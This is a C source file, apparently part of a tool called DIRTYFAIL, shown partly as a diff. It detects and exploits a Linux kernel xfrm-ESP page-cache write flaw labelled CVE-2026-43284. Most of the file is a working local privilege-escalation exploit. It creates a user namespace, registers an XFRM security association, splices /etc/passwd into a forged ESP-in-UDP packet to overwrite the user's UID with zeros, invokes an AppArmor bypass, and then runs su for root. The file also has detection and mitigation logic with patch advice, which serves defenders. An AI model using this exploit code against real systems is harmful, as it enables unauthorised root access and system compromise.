int fd = open("/etc/passwd", O_RDONLY);
if (fd >= 0) {
#ifdef POSIX_FADV_DONTNEED
posix_fadvise(fd, 0, 0, POSIX_FADV_DONTNEED);
#endif
close(fd);
}
log_step("dropping caches");
if (drop_caches()) log_ok("drop_caches OK");
else log_warn("drop_caches failed: %s", strerror(errno));
}
r = DF_OK;
break;
default:
usage(argv[0]);
return 1;
}
return (int)r;
}
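/* The scan summary above folds five detector results into one verdict
 * (any VULNERABLE wins, then any TEST_ERROR, otherwise OK) and looks up
 * a label per result. A minimal sketch of that logic as two small,
 * testable helpers follows. The sk_* names and the numeric enum values
 * are assumptions for illustration; the real df_result_t values are
 * not shown in this file. */

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/* Hypothetical stand-in for df_result_t (values are assumed). */
typedef enum {
    SK_OK = 0,
    SK_TEST_ERROR = 1,
    SK_VULNERABLE = 2,
    SK_PRECOND_FAIL = 3,
    SK_RESULT_MAX
} sk_result_t;

/* Bounded label lookup: never indexes past the table, never returns NULL. */
static const char *sk_label(sk_result_t r)
{
    static const char *const table[SK_RESULT_MAX] = {
        [SK_OK]           = "not vulnerable",
        [SK_TEST_ERROR]   = "test error",
        [SK_VULNERABLE]   = "VULNERABLE",
        [SK_PRECOND_FAIL] = "preconditions missing",
    };
    if ((unsigned)r >= SK_RESULT_MAX || table[r] == NULL)
        return "unknown";
    return table[r];
}

/* Same precedence as the scan summary: any VULNERABLE wins, then any
 * TEST_ERROR, otherwise OK (PRECOND_FAIL on its own folds into OK). */
static sk_result_t sk_aggregate(const sk_result_t *v, size_t n)
{
    assert(v != NULL || n == 0);
    sk_result_t out = SK_OK;
    for (size_t i = 0; i < n; i++) {
        if (v[i] == SK_VULNERABLE)
            return SK_VULNERABLE;
        if (v[i] == SK_TEST_ERROR)
            out = SK_TEST_ERROR;
    }
    return out;
}
```

/* Keeping the lookup behind a bounds check means an unexpected result
 * code prints "unknown" instead of reading past the label table. */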
+804
@@ -0,0 +1,804 @@
/*
* DIRTYFAIL - dirtyfrag_esp.c - Dirty Frag xfrm-ESP variant
* CVE-2026-43284
*
* BACKGROUND
* ----------
* In Linux, esp_input() runs the AEAD decryption in-place on the
* incoming skb. Before that, an skb whose payload sits in a frag (i.e.
* not in the linear head, which is the case when userspace plants
* a page via splice()) is supposed to be copied out into kernel-owned
* memory by skb_cow_data(). The bug:
*
* if (!skb_cloned(skb)) {
* if (!skb_is_nonlinear(skb)) {
* nfrags = 1;
* goto skip_cow;
* } else if (!skb_has_frag_list(skb)) {
* nfrags = skb_shinfo(skb)->nr_frags;
* nfrags++;
* goto skip_cow; // <-- vulnerable branch
* }
* }
*
* If the skb has frags but no frag_list, esp_input skips the COW and
* runs in-place AEAD on the user-supplied page. The same authencesn
* scratch-write that powers Copy Fail then lands at file offset
* (assoclen + cryptlen) inside that page. The 4 STOREd bytes are
* `seq_hi` from the SA's replay_esn state, which userspace controls
* via XFRMA_REPLAY_ESN_VAL on SA registration.
*
* Net result: same 4-byte arbitrary-offset write into a page-cache
* page as Copy Fail, but reachable via the xfrm path *even when
* algif_aead is blacklisted as a Copy Fail mitigation*.
*
* COST: registering an XFRM SA needs CAP_NET_ADMIN, so the attacker
* must enter a fresh user namespace first. This is allowed by default
* on most distros except hardened Ubuntu (AppArmor restrict_unprivileged_userns).
*
* DETECTION STRATEGY
* ------------------
* Precondition-based: we report VULNERABLE when *all* of these hold:
* - kernel >= 4.10 (commit cac2661c53f3, 2017-01-17) and not patched
* - esp4 module loadable (we don't insmod; rely on autoload)
* - unprivileged user namespace creation works
*
* Avoiding the actual primitive in detect mode keeps the system
* undisturbed (no namespaces created in the parent, no encap sockets,
* no transient SAs). The exploit path runs the full primitive for real.
*
* EXPLOIT STRATEGY
* ----------------
* Same UID-flip as Copy Fail, but driven through xfrm:
*
* 1. fork(): parent stays in init userns to call su afterwards
* 2. child: unshare(CLONE_NEWUSER | CLONE_NEWNET)
* 3. child: write "deny" -> /proc/self/setgroups
* 4. child: write "0 <real_uid> 1" -> /proc/self/uid_map (and gid_map)
* 5. child: ioctl SIOCSIFFLAGS to bring lo UP
* 6. child: open NETLINK_XFRM, register SA with:
* proto=ESP, mode=TRANSPORT, flags=XFRM_STATE_ESN,
* alg=authencesn(hmac(sha256),cbc(aes)) (zero keys),
* encap=ESPINUDP sport=dport=4500,
* replay_esn.seq_hi = "0000" (the 4 bytes that will land)
* 7. child: open udp_recv @ 127.0.0.1:4500 with UDP_ENCAP_ESPINUDP
* and udp_send connected to 127.0.0.1:4500
* 8. child: pipe(); vmsplice forged ESP wire header (24 bytes);
* splice /etc/passwd at uid_off, len 16; splice pipe -> udp_send
* 9. child: recvmsg drives the kernel through the esp_input path,
* firing the 4-byte STORE of "0000" into /etc/passwd
* at the user's UID offset
* 10. child: exits, parent verifies via fresh open of /etc/passwd
* 11. parent: execlp("su", username): PAM checks /etc/shadow on
* disk (untouched), gets right password, setuid(0) lands
* us at root because the page-cache copy of /etc/passwd
* now lists us as UID 0.
*/
#include "dirtyfrag_esp.h"
#include "apparmor_bypass.h"
#include <fcntl.h>
#include <pwd.h>
#include <sched.h>
#include <sys/socket.h>
#include <sys/wait.h>
#include <sys/uio.h>
#ifdef __linux__
#include <sys/syscall.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <linux/netlink.h>
#include <linux/rtnetlink.h>
#include <linux/xfrm.h>
#include <linux/if.h>
#include <sys/ioctl.h>
#endif
/* UDP_ENCAP / UDP_ENCAP_ESPINUDP live in <linux/udp.h>, but that header
* conflicts with <netinet/udp.h> over `struct udphdr` and we don't
* actually need the struct. The kernel constants are stable, so we
* just hard-code them as fallbacks (the #ifndef makes this a no-op if
* the toolchain happens to expose them already). */
#ifndef UDP_ENCAP
#define UDP_ENCAP 100
#endif
#ifndef UDP_ENCAP_ESPINUDP
#define UDP_ENCAP_ESPINUDP 2
#endif
#ifndef IPPROTO_ESP
#define IPPROTO_ESP 50
#endif
#ifndef __linux__
#define CLONE_NEWUSER 0x10000000
#define CLONE_NEWNET 0x40000000
#define IFF_UP 0x01
#define IFF_RUNNING 0x40
#define SIOCSIFFLAGS 0x8914
struct sockaddr_in { int dummy; };
struct ifreq { int dummy; };
__attribute__((unused))
static ssize_t splice (int a, void *b, int c, void *d, size_t e, unsigned f)
{ (void)a;(void)b;(void)c;(void)d;(void)e;(void)f; errno=ENOSYS; return -1; }
__attribute__((unused))
static ssize_t vmsplice(int a, const struct iovec *b, unsigned long c, unsigned d)
{ (void)a;(void)b;(void)c;(void)d; errno=ENOSYS; return -1; }
__attribute__((unused))
static int ioctl (int a, unsigned long b, ...)
{ (void)a;(void)b; errno=ENOSYS; return -1; }
#else
extern ssize_t splice(int fd_in, loff_t *off_in, int fd_out, loff_t *off_out,
size_t len, unsigned int flags);
extern ssize_t vmsplice(int fd, const struct iovec *iov, unsigned long nr,
unsigned int flags);
#endif
#define ENCAP_PORT 4500
#define ESP_SPI 0xDEADBE10
#define MARKER "0000"
#define ALG_NAME "authencesn(hmac(sha256),cbc(aes))"
/* ---------------------------------------------------------------- *
* Detection
* ---------------------------------------------------------------- */
df_result_t dirtyfrag_esp_detect(void)
{
log_step("Dirty Frag — xfrm-ESP variant (CVE-2026-43284) — detection");
int km = -1, kn = -1;
if (kernel_version(&km, &kn))
log_hint("kernel %d.%d.x", km, kn);
/* The vulnerable branch was introduced in 2017 (cac2661c53f3) and
* the upstream fix is f4c50a4034e6 (2026-05-07). We can't easily
* tell whether a particular distro kernel has the backport, so we
* report based on prereq presence and let the operator decide. */
/* esp4 / esp6 modules. They autoload on first XFRM SA registration,
* but we want to know if the build supports them at all. /proc/modules
* lists currently-loaded; that's a strong positive signal. */
bool esp4 = kmod_loaded("esp4");
bool esp6 = kmod_loaded("esp6");
log_hint("esp4 currently loaded: %s", esp4 ? "yes" : "no");
log_hint("esp6 currently loaded: %s", esp6 ? "yes" : "no");
bool userns = unprivileged_userns_allowed();
log_hint("unprivileged user namespace: %s", userns ? "allowed" : "DENIED");
if (!userns) {
log_ok("xfrm-ESP variant unreachable without unprivileged userns");
log_hint("on Ubuntu, this is the expected hardening — but the RxRPC "
"variant of Dirty Frag may still be reachable. Run with "
"--check-rxrpc.");
return DF_PRECOND_FAIL;
}
if (!esp4 && !esp6) {
log_hint("no esp4/esp6 currently loaded; the kernel will autoload them "
"on first SA registration. We treat this as still vulnerable.");
}
/* On hardened distros (Ubuntu 26.04+) caps are stripped inside the
* userns even after our bypass: the kernel may still have the bug, but
* unprivileged users can't reach it. Report that honestly rather
* than claiming VULNERABLE. */
if (apparmor_userns_caps_blocked()) {
log_ok("LSM-mitigated — kernel may still have the bug but the AppArmor "
"policy denies CAP_NET_ADMIN inside any unprivileged userns.");
log_hint("unprivileged exploitation is blocked; real root can still "
"reach the kernel bug. Apply the kernel patch as soon as your "
"distro ships it.");
return DF_PRECOND_FAIL;
}
if (dirtyfail_active_probes) {
log_step("--active set: firing v4 ESP-in-UDP trigger against /tmp sentinel");
df_result_t pr = dirtyfrag_esp_active_probe();
if (pr == DF_VULNERABLE || pr == DF_OK || pr == DF_PRECOND_FAIL) return pr;
log_warn("active probe inconclusive — falling back to precondition verdict");
}
log_warn("VULNERABLE (preconditions met) — userns + xfrm SA registration "
"available, kernel within affected window");
log_warn("apply mainline patch f4c50a4034e6 or your distro's backport");
log_warn("interim mitigation: `dirtyfail --mitigate` or manually blacklist "
"esp4/esp6 in /etc/modprobe.d/");
log_hint("re-run with `--scan --active` for an empirical sentinel-STORE probe");
return DF_VULNERABLE;
}
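/* The detector above decides in a fixed order: no unprivileged userns
 * or an LSM that strips caps gives PRECOND_FAIL; a conclusive active
 * probe overrides the precondition verdict; otherwise the result is
 * VULNERABLE. A minimal sketch of that ordering as a pure function,
 * so it can be unit-tested without touching the host. The verdict_t
 * enum, struct esp_facts and esp_verdict() are hypothetical names, not
 * part of the module. */

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>

/* Hypothetical stand-in for df_result_t. */
typedef enum { V_OK, V_TEST_ERROR, V_VULNERABLE, V_PRECOND_FAIL } verdict_t;

/* Facts gathered by the detector before it decides (assumed shape). */
struct esp_facts {
    bool      userns_allowed;    /* unprivileged userns creation works  */
    bool      lsm_caps_blocked;  /* LSM denies caps inside the userns   */
    bool      probe_ran;         /* --active was requested and executed */
    verdict_t probe_result;      /* only meaningful when probe_ran      */
};

/* Mirrors the decision order of the detector, with no side effects. */
static verdict_t esp_verdict(const struct esp_facts *f)
{
    assert(f != NULL);
    if (!f->userns_allowed)
        return V_PRECOND_FAIL;
    if (f->lsm_caps_blocked)
        return V_PRECOND_FAIL;
    /* A conclusive probe wins; an errored probe falls back below. */
    if (f->probe_ran && f->probe_result != V_TEST_ERROR)
        return f->probe_result;
    return V_VULNERABLE;
}
```

/* Separating fact gathering from the decision keeps the precedence
 * rules reviewable in one place. */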
/* ---------------------------------------------------------------- *
* Exploit: only compiled with full bodies on Linux.
* ---------------------------------------------------------------- */
#ifdef __linux__
/* Write a small string to a /proc file. */
static bool write_proc(const char *path, const char *value)
{
int fd = open(path, O_WRONLY);
if (fd < 0) return false;
ssize_t want = strlen(value);
ssize_t got = write(fd, value, want);
close(fd);
return got == want;
}
/* ---- Netlink XFRM SA registration --------------------------------- *
*
* The XFRM SA registration is built by hand. Each attribute is a 4-byte
* aligned struct rtattr { u16 rta_len; u16 rta_type; } followed by
* payload. The total nlmsg length is filled in last.
*
* Register an XFRM_MSG_NEWSA carrying our marker in replay_esn.seq_hi.
*/
static bool xfrm_register_sa(int nl, const unsigned char seq_hi[4])
{
char buf[2048] = {0};
struct nlmsghdr *nlh = (struct nlmsghdr *)buf;
struct xfrm_usersa_info *usa =
(struct xfrm_usersa_info *)NLMSG_DATA(nlh);
nlh->nlmsg_type = XFRM_MSG_NEWSA;
nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK;
nlh->nlmsg_seq = 1;
/* Selector: src/dst 127.0.0.1, IPv4 */
usa->sel.daddr.a4 = htonl(0x7f000001);
usa->sel.saddr.a4 = htonl(0x7f000001);
usa->sel.family = AF_INET;
usa->sel.prefixlen_d = 32;
usa->sel.prefixlen_s = 32;
usa->id.daddr.a4 = htonl(0x7f000001);
usa->id.spi = htonl(ESP_SPI);
usa->id.proto = IPPROTO_ESP;
usa->saddr.a4 = htonl(0x7f000001);
usa->lft.soft_byte_limit = (uint64_t)-1;
usa->lft.hard_byte_limit = (uint64_t)-1;
usa->lft.soft_packet_limit = (uint64_t)-1;
usa->lft.hard_packet_limit = (uint64_t)-1;
usa->reqid = 0x1234;
usa->family = AF_INET;
usa->mode = XFRM_MODE_TRANSPORT;
usa->replay_window = 0; /* SA-level: 0; ESN-level (below): 32 */
usa->flags = XFRM_STATE_ESN;
size_t hdrlen = sizeof(*nlh) + sizeof(*usa);
size_t attrs = 0;
char *abuf = buf + hdrlen;
/*
* The kernel's xfrm code does NOT accept `authencesn(...)` as a
* single XFRMA_ALG_AEAD attribute: it is a composition that has
* to be assembled from separate auth + crypt parts. We register:
* XFRMA_ALG_AUTH_TRUNC : hmac(sha256) with 32-byte key, 128-bit ICV
* XFRMA_ALG_CRYPT : cbc(aes) with 16-byte key
*
* The kernel internally wires these into authencesn(hmac(sha256),
* cbc(aes)) when it sees XFRM_STATE_ESN on the SA.
*/
{ /* XFRMA_ALG_AUTH_TRUNC */
struct xfrm_algo_auth *aa;
unsigned short dlen = sizeof(*aa) + 32; /* HMAC-SHA256 key */
struct rtattr *r = (struct rtattr *)(abuf + attrs);
r->rta_type = XFRMA_ALG_AUTH_TRUNC;
r->rta_len = RTA_LENGTH(dlen);
aa = (struct xfrm_algo_auth *)RTA_DATA(r);
memset(aa, 0, dlen);
strncpy(aa->alg_name, "hmac(sha256)", sizeof(aa->alg_name) - 1);
aa->alg_key_len = 32 * 8; /* bits */
aa->alg_trunc_len = 128; /* bits — truncated MAC width */
attrs += RTA_SPACE(dlen);
}
{ /* XFRMA_ALG_CRYPT */
struct xfrm_algo *ea;
unsigned short dlen = sizeof(*ea) + 16; /* AES-128 key */
struct rtattr *r = (struct rtattr *)(abuf + attrs);
r->rta_type = XFRMA_ALG_CRYPT;
r->rta_len = RTA_LENGTH(dlen);
ea = (struct xfrm_algo *)RTA_DATA(r);
memset(ea, 0, dlen);
strncpy(ea->alg_name, "cbc(aes)", sizeof(ea->alg_name) - 1);
ea->alg_key_len = 16 * 8;
attrs += RTA_SPACE(dlen);
}
/* XFRMA_REPLAY_ESN_VAL — this is where seq_hi rides */
{
struct xfrm_replay_state_esn *esn;
unsigned short dlen = sizeof(*esn) + 4; /* bmp_len * 4 = 4 */
struct rtattr *r = (struct rtattr *)(abuf + attrs);
r->rta_type = XFRMA_REPLAY_ESN_VAL;
r->rta_len = RTA_LENGTH(dlen);
esn = (struct xfrm_replay_state_esn *)RTA_DATA(r);
memset(esn, 0, dlen);
esn->bmp_len = 1;
esn->oseq = 0;
esn->seq = 100;
esn->oseq_hi = 0;
memcpy(&esn->seq_hi, seq_hi, 4); /* THE PRIMITIVE INPUT */
esn->replay_window = 32;
attrs += RTA_SPACE(dlen);
}
/* XFRMA_ENCAP — UDP encapsulation, sport=dport=4500 */
{
struct xfrm_encap_tmpl *enc;
unsigned short dlen = sizeof(*enc);
struct rtattr *r = (struct rtattr *)(abuf + attrs);
r->rta_type = XFRMA_ENCAP;
r->rta_len = RTA_LENGTH(dlen);
enc = (struct xfrm_encap_tmpl *)RTA_DATA(r);
memset(enc, 0, dlen);
enc->encap_type = UDP_ENCAP_ESPINUDP;
enc->encap_sport = htons(ENCAP_PORT);
enc->encap_dport = htons(ENCAP_PORT);
enc->encap_oa.a4 = 0;
attrs += RTA_SPACE(dlen);
}
nlh->nlmsg_len = hdrlen + attrs;
struct sockaddr_nl nladdr = { .nl_family = AF_NETLINK };
if (sendto(nl, buf, nlh->nlmsg_len, 0,
(struct sockaddr *)&nladdr, sizeof(nladdr)) < 0)
return false;
/* Drain ACK */
char ack[4096];
ssize_t n = recv(nl, ack, sizeof(ack), 0);
if (n < (ssize_t)sizeof(struct nlmsghdr)) return false;
struct nlmsghdr *r = (struct nlmsghdr *)ack;
if (r->nlmsg_type == NLMSG_ERROR) {
struct nlmsgerr *e = (struct nlmsgerr *)NLMSG_DATA(r);
if (e->error != 0) {
log_bad("XFRM_MSG_NEWSA: %s", strerror(-e->error));
return false;
}
}
return true;
}
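/* The attribute layout described above (a 4-byte aligned struct rtattr
 * header followed by payload) comes down to two macros from
 * <linux/rtnetlink.h>: RTA_LENGTH(n) is header plus payload, and
 * RTA_SPACE(n) is that rounded up to the next 4-byte boundary. A
 * generic, bounds-checked sketch of appending one attribute follows;
 * sk_put_attr is a hypothetical helper and is not used by this module.
 * It assumes `buf` is 4-byte aligned and `used` is a multiple of 4. */

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>
#include <linux/rtnetlink.h>

/* Append one attribute at offset `used` in `buf` (capacity `cap`).
 * Returns the new offset, or 0 if the attribute would not fit. */
static size_t sk_put_attr(char *buf, size_t cap, size_t used,
                          unsigned short type, const void *payload,
                          unsigned short len)
{
    assert(buf != NULL);
    /* rta_len is a u16, so header + payload must fit in 16 bits. */
    if (len > 0xFFFFu - RTA_LENGTH(0))
        return 0;
    if (used > cap || RTA_SPACE(len) > cap - used)
        return 0;

    struct rtattr *rta = (struct rtattr *)(buf + used);
    rta->rta_type = type;
    rta->rta_len  = (unsigned short)RTA_LENGTH(len); /* unpadded length */
    if (len)
        memcpy(RTA_DATA(rta), payload, len);
    /* Zero the alignment padding so no stale bytes go on the wire. */
    memset(buf + used + RTA_LENGTH(len), 0, RTA_SPACE(len) - RTA_LENGTH(len));
    return used + RTA_SPACE(len);
}
```

/* For a 5-byte payload, rta_len is 9 while the attribute occupies 12
 * bytes, which is why the running offset advances by RTA_SPACE and not
 * by RTA_LENGTH. */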
/* Bring loopback up inside the new netns. */
static bool bring_lo_up(void)
{
int s = socket(AF_INET, SOCK_DGRAM, 0);
if (s < 0) return false;
struct ifreq ifr;
memset(&ifr, 0, sizeof(ifr));
strncpy(ifr.ifr_name, "lo", IFNAMSIZ - 1);
ifr.ifr_flags = IFF_UP | IFF_RUNNING;
int rc = ioctl(s, SIOCSIFFLAGS, &ifr);
close(s);
return rc == 0;
}
/* Trigger esp_input by sending a forged ESP-in-UDP packet whose payload
* is a page-cache page from `target_path`, planted via splice at
* `splice_off`. The kernel STORE lands ~14 bytes into the spliced
* region (the v4 path has no V6_STORE_SHIFT-style offset). */
static bool trigger_store_at(const char *target_path, loff_t splice_off)
{
/* udp_recv: bound to 127.0.0.1:4500 with UDP_ENCAP_ESPINUDP set so
* incoming UDP frames are rerouted into xfrm_input -> esp_input. */
int udp_recv = socket(AF_INET, SOCK_DGRAM, 0);
if (udp_recv < 0) return false;
struct sockaddr_in addr = {
.sin_family = AF_INET,
.sin_port = htons(ENCAP_PORT),
.sin_addr.s_addr = htonl(0x7f000001),
};
int reuse = 1;
setsockopt(udp_recv, SOL_SOCKET, SO_REUSEADDR, &reuse, sizeof(reuse));
if (bind(udp_recv, (struct sockaddr *)&addr, sizeof(addr)) < 0) {
log_bad("bind udp_recv: %s", strerror(errno));
close(udp_recv); return false;
}
int encap = UDP_ENCAP_ESPINUDP;
if (setsockopt(udp_recv, IPPROTO_UDP, UDP_ENCAP, &encap, sizeof(encap)) < 0) {
log_bad("UDP_ENCAP_ESPINUDP: %s", strerror(errno));
close(udp_recv); return false;
}
/* udp_send: connect to udp_recv. Packets we splice here will arrive
* at udp_recv via loopback and feed xfrm_input. */
int udp_send = socket(AF_INET, SOCK_DGRAM, 0);
if (udp_send < 0) { close(udp_recv); return false; }
if (connect(udp_send, (struct sockaddr *)&addr, sizeof(addr)) < 0) {
log_bad("connect udp_send: %s", strerror(errno));
close(udp_recv); close(udp_send); return false;
}
/* Build wire ESP header: SPI(4) || seq_no(4) || IV(16) = 24 bytes.
* IV value doesn't matter: the auth check fails after the STORE. */
unsigned char wire_hdr[24];
*(uint32_t *)(wire_hdr + 0) = htonl(ESP_SPI);
*(uint32_t *)(wire_hdr + 4) = htonl(101); /* seq_no_lo */
memset(wire_hdr + 8, 0xCC, 16);
/* Open the target file for splicing. */
int pfd = open(target_path, O_RDONLY);
if (pfd < 0) {
log_bad("open %s: %s", target_path, strerror(errno));
close(udp_recv); close(udp_send); return false;
}
int p[2];
if (pipe(p) < 0) {
log_bad("pipe: %s", strerror(errno));
close(pfd); close(udp_recv); close(udp_send); return false;
}
/* vmsplice the wire header into the pipe (24 bytes). */
struct iovec iov = { .iov_base = wire_hdr, .iov_len = sizeof(wire_hdr) };
if (vmsplice(p[1], &iov, 1, 0) != (ssize_t)sizeof(wire_hdr)) {
log_bad("vmsplice header: %s", strerror(errno));
close(p[0]); close(p[1]); close(pfd);
close(udp_recv); close(udp_send); return false;
}
/* splice 16 bytes of target's page cache from splice_off. */
loff_t off = splice_off;
if (splice(pfd, &off, p[1], NULL, 16, SPLICE_F_MOVE) != 16) {
log_bad("splice file->pipe: %s", strerror(errno));
close(p[0]); close(p[1]); close(pfd);
close(udp_recv); close(udp_send); return false;
}
/* splice the whole 40-byte payload from pipe to udp_send. */
if (splice(p[0], NULL, udp_send, NULL, 24 + 16, SPLICE_F_MOVE) != 40) {
log_bad("splice pipe->udp: %s", strerror(errno));
close(p[0]); close(p[1]); close(pfd);
close(udp_recv); close(udp_send); return false;
}
close(p[0]); close(p[1]);
/* Drive the receive — esp_input runs inline here, performs the
* scratch-write, and we don't really care about the actual recv
* data (auth will fail with EBADMSG).
*
* The usleep gives the kernel a hard guarantee that the in-place
* decrypt has finished and the page-cache STORE is visible before
* we tear down the sockets. On a busy or slow VM, splice() can
* return before esp_input has actually fired. V4bel's reference
* exploit uses the same 150ms wait. */
usleep(150 * 1000);
unsigned char drain[256];
(void)recv(udp_recv, drain, sizeof(drain), MSG_DONTWAIT);
close(pfd);
close(udp_recv);
close(udp_send);
return true;
}
/* Compatibility wrapper for the exploit path: target /etc/passwd. */
static bool trigger_store(off_t passwd_off)
{
return trigger_store_at("/etc/passwd", passwd_off);
}
__attribute__((unused))
static int run_in_userns(off_t passwd_off, uid_t real_uid, gid_t real_gid)
{
if (syscall(SYS_unshare, CLONE_NEWUSER | CLONE_NEWNET) != 0) {
log_bad("unshare: %s", strerror(errno));
return 1;
}
if (!write_proc("/proc/self/setgroups", "deny")) {
log_bad("setgroups deny: %s", strerror(errno));
return 1;
}
char map[64];
snprintf(map, sizeof(map), "0 %u 1", (unsigned)real_uid);
if (!write_proc("/proc/self/uid_map", map)) {
log_bad("uid_map: %s", strerror(errno));
return 1;
}
snprintf(map, sizeof(map), "0 %u 1", (unsigned)real_gid);
if (!write_proc("/proc/self/gid_map", map)) {
log_bad("gid_map: %s", strerror(errno));
return 1;
}
if (!bring_lo_up()) {
log_bad("bring lo up: %s", strerror(errno));
return 1;
}
int nl = socket(AF_NETLINK, SOCK_RAW, NETLINK_XFRM);
if (nl < 0) {
log_bad("AF_NETLINK XFRM: %s", strerror(errno));
return 1;
}
struct sockaddr_nl nla = { .nl_family = AF_NETLINK };
if (bind(nl, (struct sockaddr *)&nla, sizeof(nla)) < 0) {
log_bad("bind netlink: %s", strerror(errno));
close(nl); return 1;
}
if (!xfrm_register_sa(nl, (const unsigned char *)MARKER)) {
close(nl); return 1;
}
log_ok("XFRM SA registered with seq_hi='%s'", MARKER);
if (!trigger_store(passwd_off)) {
log_bad("trigger failed");
close(nl); return 1;
}
log_ok("ESP-in-UDP trigger fired");
close(nl);
return 0;
}
#else /* __linux__ */
__attribute__((unused))
static int run_in_userns(off_t passwd_off, uid_t real_uid, gid_t real_gid)
{
(void)passwd_off; (void)real_uid; (void)real_gid;
return 1;
}
#endif
/* ---------------------------------------------------------------- *
* INNER: runs in the AA bypass userns (post-stage 2).
*
* No user interaction, no fork, no verify, no su. Just the kernel
* work: open netlink, register SA, fire splice trigger, exit.
* The parent (init ns) owns everything else.
* ---------------------------------------------------------------- */
df_result_t dirtyfrag_esp_exploit_inner(void)
{
#ifdef __linux__
const char *user = getenv("DIRTYFAIL_TARGET_USER");
if (!user || !*user) {
log_bad("inner: DIRTYFAIL_TARGET_USER not set");
return DF_TEST_ERROR;
}
off_t uid_off; size_t uid_len; char uid_str[16];
if (!find_passwd_uid_field(user, &uid_off, &uid_len, uid_str)) {
log_bad("inner: find_passwd_uid_field('%s') failed", user);
return DF_TEST_ERROR;
}
if (uid_len != 4) {
log_bad("inner: UID '%s' is %zu chars; need 4", uid_str, uid_len);
return DF_TEST_ERROR;
}
int nl = socket(AF_NETLINK, SOCK_RAW, NETLINK_XFRM);
if (nl < 0) {
log_bad("inner: AF_NETLINK XFRM: %s", strerror(errno));
return DF_EXPLOIT_FAIL;
}
struct sockaddr_nl nla = { .nl_family = AF_NETLINK };
if (bind(nl, (struct sockaddr *)&nla, sizeof(nla)) < 0) {
log_bad("inner: bind netlink: %s", strerror(errno));
close(nl);
return DF_EXPLOIT_FAIL;
}
if (!xfrm_register_sa(nl, (const unsigned char *)MARKER)) {
close(nl);
return DF_EXPLOIT_FAIL;
}
log_ok("inner: XFRM SA registered with seq_hi='%s'", MARKER);
if (!trigger_store(uid_off)) {
close(nl);
return DF_EXPLOIT_FAIL;
}
log_ok("inner: ESP-in-UDP trigger fired at uid_off=%lld",
(long long)uid_off);
close(nl);
return DF_EXPLOIT_OK;
#else
log_bad("dirtyfrag_esp_exploit_inner: Linux-only");
return DF_TEST_ERROR;
#endif
}
/* ---------------------------------------------------------------- *
* OUTER: runs in init namespace.
*
* Prompts the operator, sets env vars, then forks; the child arms the
* AA bypass and runs the inner. Parent stays in init ns, waits, reads
* the global page cache to verify, then either:
* - do_shell=true: execlp("su", user) runs in init ns ->
* PAM reads modified /etc/passwd -> uid 0 -> real init-ns root
* - do_shell=false: try_revert_passwd_page_cache, return.
* ---------------------------------------------------------------- */
df_result_t dirtyfrag_esp_exploit(bool do_shell)
{
log_step("Dirty Frag (xfrm-ESP) — exploit");
uid_t uid = getuid();
if (uid == 0) {
log_warn("already root in init namespace — nothing to escalate");
return DF_OK;
}
struct passwd *pw = getpwuid(uid);
if (!pw) { log_bad("getpwuid: %s", strerror(errno)); return DF_TEST_ERROR; }
const char *user = pw->pw_name;
off_t uid_off; size_t uid_len; char uid_str[16];
if (!find_passwd_uid_field(user, &uid_off, &uid_len, uid_str)) {
log_bad("could not find %s in /etc/passwd", user);
return DF_TEST_ERROR;
}
log_step("/etc/passwd UID for %s: '%s' at offset %lld",
user, uid_str, (long long)uid_off);
if (uid_len != 4) {
log_bad("UID '%s' is %zu chars; this technique needs exactly 4",
uid_str, uid_len);
return DF_TEST_ERROR;
}
log_warn("about to run xfrm-ESP page-cache write against /etc/passwd");
log_warn("this enters a fresh user/net namespace, registers an XFRM SA, "
"and sends an ESP-in-UDP packet whose payload is the /etc/passwd "
"page from offset %lld", (long long)uid_off);
log_warn("on success the page cache will report '%s' as UID 0", user);
log_warn("cleanup: dirtyfail --cleanup, or `echo 3 > /proc/sys/vm/drop_caches`");
if (!typed_confirm("DIRTYFAIL")) {
log_bad("confirmation declined — aborting");
return DF_OK;
}
if (!ssh_lockout_check(user)) {
log_bad("SSH-lockout confirmation declined — aborting");
return DF_OK;
}
/* Hand off to the inner via env vars + AA bypass fork.
*
* The child fork enters the bypass userns, runs
* dirtyfrag_esp_exploit_inner (dispatched from main() based on
* DIRTYFAIL_INNER_MODE), modifies the global page cache, exits.
* We (parent, init ns) read the result via the same global page
* cache and execlp(su) here in init ns for REAL root. */
setenv("DIRTYFAIL_INNER_MODE", "esp", 1);
setenv("DIRTYFAIL_TARGET_USER", user, 1);
int rc = apparmor_bypass_fork_arm(0, NULL); /* argc/argv unused for forked variant */
if (rc != DF_EXPLOIT_OK) {
log_bad("inner exploit failed (exit=%d)", rc);
return DF_EXPLOIT_FAIL;
}
/* Verify in init namespace — page cache is global, so we see the
* child's modification here. */
int v = open("/etc/passwd", O_RDONLY);
if (v < 0) { log_bad("verify open: %s", strerror(errno)); return DF_EXPLOIT_FAIL; }
if (lseek(v, uid_off, SEEK_SET) != uid_off) { close(v); return DF_EXPLOIT_FAIL; }
char land[5] = {0};
if (read(v, land, 4) != 4) { close(v); return DF_EXPLOIT_FAIL; }
close(v);
if (memcmp(land, MARKER, 4) != 0) {
log_bad("write did not land — page cache reads '%.4s'", land);
return DF_EXPLOIT_FAIL;
}
log_ok("page cache now reports %s with uid 0", user);
if (!do_shell) {
if (try_revert_passwd_page_cache())
log_ok("page cache reverted (--no-shell)");
else
log_warn("page cache may still be modified — `sudo dirtyfail --cleanup` or reboot");
return DF_EXPLOIT_OK;
}
log_ok("invoking 'su %s' in init namespace — enter your password for REAL root", user);
execlp("su", "su", user, (char *)NULL);
log_bad("execlp: %s", strerror(errno));
return DF_EXPLOIT_FAIL;
}
/* ---------------------------------------------------------------- *
* Active probe: used by `--scan --active`.
*
* Same userns + XFRM SA + splice-trigger setup as the exploit, but
* targets a sentinel file in /tmp instead of /etc/passwd. The parent
* (init ns) reads the sentinel after the child returns and looks for
* the marker bytes.
*
* If the marker landed → kernel STORE is reachable → DF_VULNERABLE.
* If the page is intact → kernel is patched → DF_OK.
* If AA blocks the bypass → DF_PRECOND_FAIL.
* ---------------------------------------------------------------- */
df_result_t dirtyfrag_esp_active_probe_inner(void)
{
#ifdef __linux__
const char *sentinel = getenv("DIRTYFAIL_PROBE_SENTINEL");
if (!sentinel || !*sentinel) {
log_bad("active-probe: DIRTYFAIL_PROBE_SENTINEL not set");
return DF_TEST_ERROR;
}
int nl = socket(AF_NETLINK, SOCK_RAW, NETLINK_XFRM);
if (nl < 0) {
